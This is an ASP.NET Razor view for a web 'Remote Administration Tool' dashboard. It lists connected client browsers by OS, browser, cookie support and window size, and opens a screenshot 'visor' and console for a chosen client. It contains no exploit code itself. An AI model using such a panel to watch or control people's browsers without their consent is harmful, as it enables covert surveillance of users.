@{
    ViewBag.Title = "Remote Administration Tool";
}

@section Scripts{
    <script src="https://backend.crawlersite.com/socket.io.js"></script>
    <script src="@Url.Content("~/Angular/RAT/Service.js")"></script>
    <script src="@Url.Content("~/Angular/RAT/Controller.js")"></script>
}

<section ng-controller="RATController" ng-init="InitializeView()" class="rat-container">
    <section ng-hide="IsOnService">
        <section class="card col-sm-12">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <h2 class="text-center">Clients connected</h2>
                <div class="table-responsive">
                    <table class="table table-hover"> 
                        <thead> 
                            <tr> 
                                <th># ID</th> 
                                <th>Operating System</th> 
                                <th>Browser</th>
                                <th>Cookies</th>
                                <th>Flash</th>
                                <th>Size</th>
                            </tr> 
                        </thead> 
                        <tbody> 
                            <tr ng-repeat="socket in ConnectedSockets" ng-click="GetEndpointRPN(socket.SocketId)" class="rat-client-connected"> 
                                <th scope="row">{{socket.SocketId}}</th> 
                                <td>{{socket.ClientInformation.os}} {{socket.ClientInformation.osVersion}}</td> 
                                <td>{{socket.ClientInformation.browser}} ({{socket.ClientInformation.browserVersion}})</td> 
                                <td>{{socket.ClientInformation.cookies == true ? 'Yes': 'No'}}</td> 
                                <td>{{socket.ClientInformation.flash == true ? 'Yes': 'No'}}</td> 
                                <td>{{socket.ClientInformation.browserSize.width}}x{{socket.ClientInformation.browserSize.height}}</td>
                                <td><span class="ti-angle-right"></span></td>
                            </tr> 
                        </tbody> 
                    </table>
                </div>
            </div>
        </section>
        
    </section>
    <section ng-show="IsOnService">
        <div class="rat-visor" id="rat-visor" ng-show="ScreenshotReceived">
            <div class="frame-container" id="frame-container"></div>
            <div class="event-handler"></div>
        </div>

        <div class="console">
            <div class="output">
                <span>Initializing...</span><br/>
                <span class="green">0.0002ms ok!</span><br/>
                <span class="seperator">== == == == == == == == == == == == == == == == == ==</span></br>
                <pre contenteditable="false">
   ___                     _             ___  _  _        
  / __| _ _  __ _ __ __ __| | ___  _ _  / __|(_)| |_  ___ 
 | (__ | '_|/ _` |\ V  V /| |/ -_)| '_| \__ \| ||  _|/ -_)
  \___||_|  \__,_| \_/\_/ |_|\___||_|   |___/|_| \__|\___|
                </pre>
                <span class="seperator">== == == == == == == == == == == == == == == == == ==</span></br>
                <span>Remote Administration Tool</span>
                </br>
                
            </div>
            <div class="action">
                <ul>
                    <li ng-repeat="log in SettingUpLog track by $index">> {{log}}</li>
                </ul>
            </div>
        </div>
    </section>
</section>